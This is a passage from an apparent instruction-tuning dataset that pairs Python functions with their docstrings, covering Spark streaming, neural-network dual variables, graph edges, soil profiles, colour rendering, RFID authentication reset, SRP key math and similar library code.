cls = SparkContext._jvm.org.apache.spark.streaming.api.java.JavaDStream
jdstreams = SparkContext._gateway.new_array(cls, len(dstreams))
for i in range(0, len(dstreams)):
jdstreams[i] = dstreams[i]._jdstream
return DStream(self._jssc.union(jdstreams), self, dstreams[0]._jrdd_deserializer) |
def initialize_dual(neural_net_params_object, init_dual_file=None,
random_init_variance=0.01, init_nu=200.0):
"""Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately.
"""
lambda_pos = []
lambda_neg = []
lambda_quad = []
lambda_lu = []
if init_dual_file is None:
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_pos.append(tf.get_variable('lambda_pos_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_neg.append(tf.get_variable('lambda_neg_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_quad.append(tf.get_variable('lambda_quad_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_lu.append(tf.get_variable('lambda_lu_' + str(i),
initializer=initializer,
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=init_nu)
else:
# Loading from file
dual_var_init_val = np.load(init_dual_file).item()
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
lambda_pos.append(
tf.get_variable('lambda_pos_' + str(i),
initializer=dual_var_init_val['lambda_pos'][i],
dtype=tf.float32))
lambda_neg.append(
tf.get_variable('lambda_neg_' + str(i),
initializer=dual_var_init_val['lambda_neg'][i],
dtype=tf.float32))
lambda_quad.append(
tf.get_variable('lambda_quad_' + str(i),
initializer=dual_var_init_val['lambda_quad'][i],
dtype=tf.float32))
lambda_lu.append(
tf.get_variable('lambda_lu_' + str(i),
initializer=dual_var_init_val['lambda_lu'][i],
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=1.0*dual_var_init_val['nu'])
dual_var = {'lambda_pos': lambda_pos, 'lambda_neg': lambda_neg,
'lambda_quad': lambda_quad, 'lambda_lu': lambda_lu, 'nu': nu}
return dual_var | Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately. | Below is the the instruction that describes the task:
### Input:
Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately.
### Response:
def initialize_dual(neural_net_params_object, init_dual_file=None,
random_init_variance=0.01, init_nu=200.0):
"""Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately.
"""
lambda_pos = []
lambda_neg = []
lambda_quad = []
lambda_lu = []
if init_dual_file is None:
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_pos.append(tf.get_variable('lambda_pos_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_neg.append(tf.get_variable('lambda_neg_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_quad.append(tf.get_variable('lambda_quad_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_lu.append(tf.get_variable('lambda_lu_' + str(i),
initializer=initializer,
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=init_nu)
else:
# Loading from file
dual_var_init_val = np.load(init_dual_file).item()
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
lambda_pos.append(
tf.get_variable('lambda_pos_' + str(i),
initializer=dual_var_init_val['lambda_pos'][i],
dtype=tf.float32))
lambda_neg.append(
tf.get_variable('lambda_neg_' + str(i),
initializer=dual_var_init_val['lambda_neg'][i],
dtype=tf.float32))
lambda_quad.append(
tf.get_variable('lambda_quad_' + str(i),
initializer=dual_var_init_val['lambda_quad'][i],
dtype=tf.float32))
lambda_lu.append(
tf.get_variable('lambda_lu_' + str(i),
initializer=dual_var_init_val['lambda_lu'][i],
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=1.0*dual_var_init_val['nu'])
dual_var = {'lambda_pos': lambda_pos, 'lambda_neg': lambda_neg,
'lambda_quad': lambda_quad, 'lambda_lu': lambda_lu, 'nu': nu}
return dual_var |
def del_edge(self, edge):
"""
Remove an edge from the graph.
@type edge: tuple
@param edge: Edge.
"""
u, v = edge
self.node_neighbors[u].remove(v)
self.del_edge_labeling((u, v))
if (u != v):
self.node_neighbors[v].remove(u)
self.del_edge_labeling((v, u)) | Remove an edge from the graph.
@type edge: tuple
@param edge: Edge. | Below is the the instruction that describes the task:
### Input:
Remove an edge from the graph.
@type edge: tuple
@param edge: Edge.
### Response:
def del_edge(self, edge):
"""
Remove an edge from the graph.
@type edge: tuple
@param edge: Edge.
"""
u, v = edge
self.node_neighbors[u].remove(v)
self.del_edge_labeling((u, v))
if (u != v):
self.node_neighbors[v].remove(u)
self.del_edge_labeling((v, u)) |
def discretize_soil_profile(sp, incs=None, target=1.0):
"""
Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict
"""
if incs is None:
incs = np.ones(sp.n_layers) * target
dd = {}
dd["thickness"] = []
dd["unit_mass"] = []
dd["shear_vel"] = []
cum_thickness = 0
for i in range(sp.n_layers):
sl = sp.layer(i + 1)
thickness = sp.layer_height(i + 1)
n_slices = max(int(thickness / incs[i]), 1)
slice_thickness = float(thickness) / n_slices
for j in range(n_slices):
cum_thickness += slice_thickness
if cum_thickness >= sp.gwl:
rho = sl.unit_sat_mass
saturation = True
else:
rho = sl.unit_dry_mass
saturation = False
if hasattr(sl, "get_shear_vel_at_v_eff_stress"):
v_eff = sp.vertical_effective_stress(cum_thickness)
vs = sl.get_shear_vel_at_v_eff_stress(v_eff, saturation)
else:
vs = sl.calc_shear_vel(saturation)
dd["shear_vel"].append(vs)
dd["unit_mass"].append(rho)
dd["thickness"].append(slice_thickness)
for item in dd:
dd[item] = np.array(dd[item])
return dd | Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict | Below is the the instruction that describes the task:
### Input:
Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict
### Response:
def discretize_soil_profile(sp, incs=None, target=1.0):
"""
Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict
"""
if incs is None:
incs = np.ones(sp.n_layers) * target
dd = {}
dd["thickness"] = []
dd["unit_mass"] = []
dd["shear_vel"] = []
cum_thickness = 0
for i in range(sp.n_layers):
sl = sp.layer(i + 1)
thickness = sp.layer_height(i + 1)
n_slices = max(int(thickness / incs[i]), 1)
slice_thickness = float(thickness) / n_slices
for j in range(n_slices):
cum_thickness += slice_thickness
if cum_thickness >= sp.gwl:
rho = sl.unit_sat_mass
saturation = True
else:
rho = sl.unit_dry_mass
saturation = False
if hasattr(sl, "get_shear_vel_at_v_eff_stress"):
v_eff = sp.vertical_effective_stress(cum_thickness)
vs = sl.get_shear_vel_at_v_eff_stress(v_eff, saturation)
else:
vs = sl.calc_shear_vel(saturation)
dd["shear_vel"].append(vs)
dd["unit_mass"].append(rho)
dd["thickness"].append(slice_thickness)
for item in dd:
dd[item] = np.array(dd[item])
return dd |
def _check_valid_data(self, data):
"""Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid.
"""
if data.dtype.type is not np.uint8:
raise ValueError(
'Illegal data type. Color images only support uint8 arrays')
if len(data.shape) != 3 or data.shape[2] != 3:
raise ValueError(
'Illegal data type. Color images only support three channels') | Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid. | Below is the the instruction that describes the task:
### Input:
Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid.
### Response:
def _check_valid_data(self, data):
"""Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid.
"""
if data.dtype.type is not np.uint8:
raise ValueError(
'Illegal data type. Color images only support uint8 arrays')
if len(data.shape) != 3 or data.shape[2] != 3:
raise ValueError(
'Illegal data type. Color images only support three channels') |
def get_object(cls, api_token, image_id_or_slug):
"""
Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
number, it will be considered as an Image ID, instead if it is a
string, it will considered as slug.
"""
if cls._is_string(image_id_or_slug):
image = cls(token=api_token, slug=image_id_or_slug)
image.load(use_slug=True)
else:
image = cls(token=api_token, id=image_id_or_slug)
image.load()
return image | Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
number, it will be considered as an Image ID, instead if it is a
string, it will considered as slug. | Below is the the instruction that describes the task:
### Input:
Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
number, it will be considered as an Image ID, instead if it is a
string, it will considered as slug.
### Response:
def get_object(cls, api_token, image_id_or_slug):
"""
Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
number, it will be considered as an Image ID, instead if it is a
string, it will considered as slug.
"""
if cls._is_string(image_id_or_slug):
image = cls(token=api_token, slug=image_id_or_slug)
image.load(use_slug=True)
else:
image = cls(token=api_token, id=image_id_or_slug)
image.load()
return image |
def render(self, compress=False):
"""Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function).
"""
if not compress and self.original_literal:
return self.original_literal
candidates = []
# TODO this assumes CSS resolution is 8-bit per channel, but so does
# Ruby.
r, g, b, a = self.value
r, g, b = int(round(r)), int(round(g)), int(round(b))
# Build a candidate list in order of preference. If `compress` is
# True, the shortest candidate is used; otherwise, the first candidate
# is used.
# Try color name
key = r, g, b, a
if key in COLOR_LOOKUP:
candidates.append(COLOR_LOOKUP[key])
if a == 1:
# Hex is always shorter than function notation
if all(ch % 17 == 0 for ch in (r, g, b)):
candidates.append("#%1x%1x%1x" % (r // 17, g // 17, b // 17))
else:
candidates.append("#%02x%02x%02x" % (r, g, b))
else:
# Can't use hex notation for RGBA
if compress:
sp = ''
else:
sp = ' '
candidates.append("rgba(%d,%s%d,%s%d,%s%.6g)" % (r, sp, g, sp, b, sp, a))
if compress:
return min(candidates, key=len)
else:
return candidates[0] | Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function). | Below is the the instruction that describes the task:
### Input:
Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function).
### Response:
def render(self, compress=False):
"""Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function).
"""
if not compress and self.original_literal:
return self.original_literal
candidates = []
# TODO this assumes CSS resolution is 8-bit per channel, but so does
# Ruby.
r, g, b, a = self.value
r, g, b = int(round(r)), int(round(g)), int(round(b))
# Build a candidate list in order of preference. If `compress` is
# True, the shortest candidate is used; otherwise, the first candidate
# is used.
# Try color name
key = r, g, b, a
if key in COLOR_LOOKUP:
candidates.append(COLOR_LOOKUP[key])
if a == 1:
# Hex is always shorter than function notation
if all(ch % 17 == 0 for ch in (r, g, b)):
candidates.append("#%1x%1x%1x" % (r // 17, g // 17, b // 17))
else:
candidates.append("#%02x%02x%02x" % (r, g, b))
else:
# Can't use hex notation for RGBA
if compress:
sp = ''
else:
sp = ' '
candidates.append("rgba(%d,%s%d,%s%d,%s%.6g)" % (r, sp, g, sp, b, sp, a))
if compress:
return min(candidates, key=len)
else:
return candidates[0] |
def get_record(self, msg_id):
"""Get a specific Task Record, by msg_id."""
cursor = self._db.execute("""SELECT * FROM %s WHERE msg_id==?"""%self.table, (msg_id,))
line = cursor.fetchone()
if line is None:
raise KeyError("No such msg: %r"%msg_id)
return self._list_to_dict(line) | Get a specific Task Record, by msg_id. | Below is the the instruction that describes the task:
### Input:
Get a specific Task Record, by msg_id.
### Response:
def get_record(self, msg_id):
"""Get a specific Task Record, by msg_id."""
cursor = self._db.execute("""SELECT * FROM %s WHERE msg_id==?"""%self.table, (msg_id,))
line = cursor.fetchone()
if line is None:
raise KeyError("No such msg: %r"%msg_id)
return self._list_to_dict(line) |
def parse_contact(self):
"""Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned.
"""
self.parse_whitespace()
name = self.parse_name() # parse a name expression and get the string.
if not name: # No name was found so shout it out.
raise PartpyError(self, 'Expecting a name')
self.parse_whitespace()
# allow name and email to be delimited by either a ':' or '-'
if not self.match_any_char(':-'):
raise PartpyError(self, 'Expecting : or -')
self.eat_length(1)
self.parse_whitespace()
email = self.parse_email() # parse an email and store its string.
if not email:
raise PartpyError(self, 'Expecting an email address')
return (name, email) | Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned. | Below is the the instruction that describes the task:
### Input:
Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned.
### Response:
def parse_contact(self):
"""Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned.
"""
self.parse_whitespace()
name = self.parse_name() # parse a name expression and get the string.
if not name: # No name was found so shout it out.
raise PartpyError(self, 'Expecting a name')
self.parse_whitespace()
# allow name and email to be delimited by either a ':' or '-'
if not self.match_any_char(':-'):
raise PartpyError(self, 'Expecting : or -')
self.eat_length(1)
self.parse_whitespace()
email = self.parse_email() # parse an email and store its string.
if not email:
raise PartpyError(self, 'Expecting an email address')
return (name, email) |
def ensembl_to_kegg(organism,kegg_db):
"""
Looks up KEGG mappings of KEGG ids to ensembl ids
:param organism: an organisms as listed in organismsKEGG()
:param kegg_db: a matching KEGG db as reported in databasesKEGG
:returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'.
"""
print("KEGG API: http://rest.genome.jp/link/"+kegg_db+"/"+organism)
sys.stdout.flush()
kegg_ens=urlopen("http://rest.genome.jp/link/"+kegg_db+"/"+organism).read()
kegg_ens=kegg_ens.split("\n")
final=[]
for i in kegg_ens:
final.append(i.split("\t"))
df=pd.DataFrame(final[0:len(final)-1])[[0,1]]
ens_id=pd.DataFrame(df[1].str.split(":").tolist())[1]
df=pd.concat([df,ens_id],axis=1)
df.columns=['KEGGid','ensDB','ENSid']
df=df[['KEGGid','ENSid']]
return df | Looks up KEGG mappings of KEGG ids to ensembl ids
:param organism: an organisms as listed in organismsKEGG()
:param kegg_db: a matching KEGG db as reported in databasesKEGG
:returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'. | Below is the the instruction that describes the task:
### Input:
Looks up KEGG mappings of KEGG ids to ensembl ids
:param organism: an organisms as listed in organismsKEGG()
:param kegg_db: a matching KEGG db as reported in databasesKEGG
:returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'.
### Response:
def ensembl_to_kegg(organism,kegg_db):
"""
Looks up KEGG mappings of KEGG ids to ensembl ids
:param organism: an organisms as listed in organismsKEGG()
:param kegg_db: a matching KEGG db as reported in databasesKEGG
:returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'.
"""
print("KEGG API: http://rest.genome.jp/link/"+kegg_db+"/"+organism)
sys.stdout.flush()
kegg_ens=urlopen("http://rest.genome.jp/link/"+kegg_db+"/"+organism).read()
kegg_ens=kegg_ens.split("\n")
final=[]
for i in kegg_ens:
final.append(i.split("\t"))
df=pd.DataFrame(final[0:len(final)-1])[[0,1]]
ens_id=pd.DataFrame(df[1].str.split(":").tolist())[1]
df=pd.concat([df,ens_id],axis=1)
df.columns=['KEGGid','ensDB','ENSid']
df=df[['KEGGid','ENSid']]
return df |
def generate_one(self):
"""Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True
"""
# Get the weights for all items in the domain
weights = [self.probability_func(self.generated[element])
for element in self.domain]
# Sample from the domain using the weights
element = random.choices(self.domain, weights=weights)[0]
# Update the generated values and return
self.generated[element] += 1
return element | Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True | Below is the the instruction that describes the task:
### Input:
Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True
### Response:
def generate_one(self):
"""Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True
"""
# Get the weights for all items in the domain
weights = [self.probability_func(self.generated[element])
for element in self.domain]
# Sample from the domain using the weights
element = random.choices(self.domain, weights=weights)[0]
# Update the generated values and return
self.generated[element] += 1
return element |
def get_channel_info(self):
"""
Returns the first data row from Channel.csv
"""
csv_filename = get_metadata_file_path(channeldir=self.channeldir, filename=self.channelinfo)
csv_lines = _read_csv_lines(csv_filename)
dict_reader = csv.DictReader(csv_lines)
channel_csvs_list = list(dict_reader)
channel_csv = channel_csvs_list[0]
if len(channel_csvs_list) > 1:
raise ValueError('Found multiple channel rows in ' + self.channelinfo)
channel_cleaned = _clean_dict(channel_csv)
channel_info = self._map_channel_row_to_dict(channel_cleaned)
return channel_info | Returns the first data row from Channel.csv | Below is the the instruction that describes the task:
### Input:
Returns the first data row from Channel.csv
### Response:
def get_channel_info(self):
"""
Returns the first data row from Channel.csv
"""
csv_filename = get_metadata_file_path(channeldir=self.channeldir, filename=self.channelinfo)
csv_lines = _read_csv_lines(csv_filename)
dict_reader = csv.DictReader(csv_lines)
channel_csvs_list = list(dict_reader)
channel_csv = channel_csvs_list[0]
if len(channel_csvs_list) > 1:
raise ValueError('Found multiple channel rows in ' + self.channelinfo)
channel_cleaned = _clean_dict(channel_csv)
channel_info = self._map_channel_row_to_dict(channel_cleaned)
return channel_info |
def respond_to_SIGTERM(signal_number, frame, target=None):
""" these classes are instrumented to respond to a KeyboardInterrupt by
cleanly shutting down. This function, when given as a handler to for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below.
"""
if target:
target.config.logger.info('detected SIGTERM')
# by setting the quit flag to true, any calls to the 'quit_check'
# method that is so liberally passed around in this framework will
# result in raising the quit exception. The current quit exception
# is KeyboardInterrupt
target.task_manager.quit = True
else:
raise KeyboardInterrupt | these classes are instrumented to respond to a KeyboardInterrupt by
cleanly shutting down. This function, when given as a handler to for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below. | Below is the the instruction that describes the task:
### Input:
these classes are instrumented to respond to a KeyboardInterrupt by
cleanly shutting down. This function, when given as a handler to for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below.
### Response:
def respond_to_SIGTERM(signal_number, frame, target=None):
""" these classes are instrumented to respond to a KeyboardInterrupt by
cleanly shutting down. This function, when given as a handler to for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below.
"""
if target:
target.config.logger.info('detected SIGTERM')
# by setting the quit flag to true, any calls to the 'quit_check'
# method that is so liberally passed around in this framework will
# result in raising the quit exception. The current quit exception
# is KeyboardInterrupt
target.task_manager.quit = True
else:
raise KeyboardInterrupt |
def deauth(self):
"""
Resets authentication info. Calls stop_crypto() if RFID is in auth state
"""
self.method = None
self.key = None
self.last_auth = None
if self.debug:
print("Changing auth key and method to None")
if self.rfid.authed:
self.rfid.stop_crypto()
if self.debug:
print("Stopping crypto1") | Resets authentication info. Calls stop_crypto() if RFID is in auth state | Below is the the instruction that describes the task:
### Input:
Resets authentication info. Calls stop_crypto() if RFID is in auth state
### Response:
def deauth(self):
"""
Resets authentication info. Calls stop_crypto() if RFID is in auth state
"""
self.method = None
self.key = None
self.last_auth = None
if self.debug:
print("Changing auth key and method to None")
if self.rfid.authed:
self.rfid.stop_crypto()
if self.debug:
print("Stopping crypto1") |
def get_checker_executable(name):
"""Return checker executable in the form of a list of arguments
for subprocess.Popen"""
if programs.is_program_installed(name):
# Checker is properly installed
return [name]
else:
path1 = programs.python_script_exists(package=None,
module=name+'_script')
path2 = programs.python_script_exists(package=None, module=name)
if path1 is not None: # checker_script.py is available
# Checker script is available but has not been installed
# (this may work with pyflakes)
return [sys.executable, path1]
elif path2 is not None: # checker.py is available
# Checker package is available but its script has not been
# installed (this works with pycodestyle but not with pyflakes)
return [sys.executable, path2] | Return checker executable in the form of a list of arguments
for subprocess.Popen | Below is the the instruction that describes the task:
### Input:
Return checker executable in the form of a list of arguments
for subprocess.Popen
### Response:
def get_checker_executable(name):
"""Return checker executable in the form of a list of arguments
for subprocess.Popen"""
if programs.is_program_installed(name):
# Checker is properly installed
return [name]
else:
path1 = programs.python_script_exists(package=None,
module=name+'_script')
path2 = programs.python_script_exists(package=None, module=name)
if path1 is not None: # checker_script.py is available
# Checker script is available but has not been installed
# (this may work with pyflakes)
return [sys.executable, path1]
elif path2 is not None: # checker.py is available
# Checker package is available but its script has not been
# installed (this works with pycodestyle but not with pyflakes)
return [sys.executable, path2] |
def get_client_premaster_secret(self, password_hash, server_public, client_private, common_secret):
"""S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int
"""
password_verifier = self.get_common_password_verifier(password_hash)
return pow(
(server_public - (self._mult * password_verifier)),
(client_private + (common_secret * password_hash)), self._prime) | S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int | Below is the the instruction that describes the task:
### Input:
S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int
### Response:
def get_client_premaster_secret(self, password_hash, server_public, client_private, common_secret):
"""S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int
"""
password_verifier = self.get_common_password_verifier(password_hash)
return pow(
(server_public - (self._mult * password_verifier)),
(client_private + (common_secret * password_hash)), self._prime) |
def decode_chain_list(in_bytes):
"""Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings"""
tot_strings = len(in_bytes) // mmtf.utils.constants.CHAIN_LEN
out_strings = []
for i in range(tot_strings):
out_s = in_bytes[i * mmtf.utils.constants.CHAIN_LEN:i * mmtf.utils.constants.CHAIN_LEN + mmtf.utils.constants.CHAIN_LEN]
out_strings.append(out_s.decode("ascii").strip(mmtf.utils.constants.NULL_BYTE))
return out_strings | Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings | Below is the the instruction that describes the task:
### Input:
Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings
### Response:
def decode_chain_list(in_bytes):
"""Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings"""
tot_strings = len(in_bytes) // mmtf.utils.constants.CHAIN_LEN
out_strings = []
for i in range(tot_strings):
out_s = in_bytes[i * mmtf.utils.constants.CHAIN_LEN:i * mmtf.utils.constants.CHAIN_LEN + mmtf.utils.constants.CHAIN_LEN]
out_strings.append(out_s.decode("ascii").strip(mmtf.utils.constants.NULL_BYTE))
return out_strings |
def unpack(cls, rawpacket):
"""Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed.
"""
structs_ = get_structs_for_rawpacket(rawpacket)
for struct_ in structs_:
try:
return cls(*struct_.unpack(rawpacket))
except struct.error:
raise
# Try next one.
pass
# Packet ID 0xff is a pseudo-packet representing
# packets unknown to `python-TSIP` in their raw format.
#
return cls(0xff, rawpacket) | Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed. | Below is the the instruction that describes the task:
### Input:
Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed.
### Response:
def unpack(cls, rawpacket):
"""Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed.
"""
structs_ = get_structs_for_rawpacket(rawpacket)
for struct_ in structs_:
try:
return cls(*struct_.unpack(rawpacket))
except struct.error:
raise
# Try next one.
pass
# Packet ID 0xff is a pseudo-packet representing
# packets unknown to `python-TSIP` in their raw format.
#
return cls(0xff, rawpacket) |
def is_op(call, op):
"""
:param call: The specific operator instance (a method call)
:param op: The the operator we are testing against
:return: isinstance(call, op), but faster
"""
try:
return call.id == op.id
except Exception as e:
return False | :param call: The specific operator instance (a method call)
:param op: The the operator we are testing against
:return: isinstance(call, op), but faster | Below is the the instruction that describes the task:
### Input:
:param call: The specific operator instance (a method call)
:param op: The the operator we are testing against
:return: isinstance(call, op), but faster
### Response:
def is_op(call, op):
"""
:param call: The specific operator instance (a method call)
:param op: The the operator we are testing against
:return: isinstance(call, op), but faster
"""
try:
return call.id == op.id
except Exception as e:
return False |
def add_script_sequence(self):
"""
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded
"""
def empty_tree(tree_model):
# COMMENT_ME
def add_children_to_list(item, somelist):
if item.hasChildren():
for rownum in range(0, item.rowCount()):
somelist.append(str(item.child(rownum, 0).text()))
output_list = []
root = tree_model.invisibleRootItem()
add_children_to_list(root, output_list)
tree_model.clear()
return output_list
name = str(self.txt_script_sequence_name.text())
new_script_list = empty_tree(self.tree_script_sequence_model)
new_script_dict = {}
for script in new_script_list:
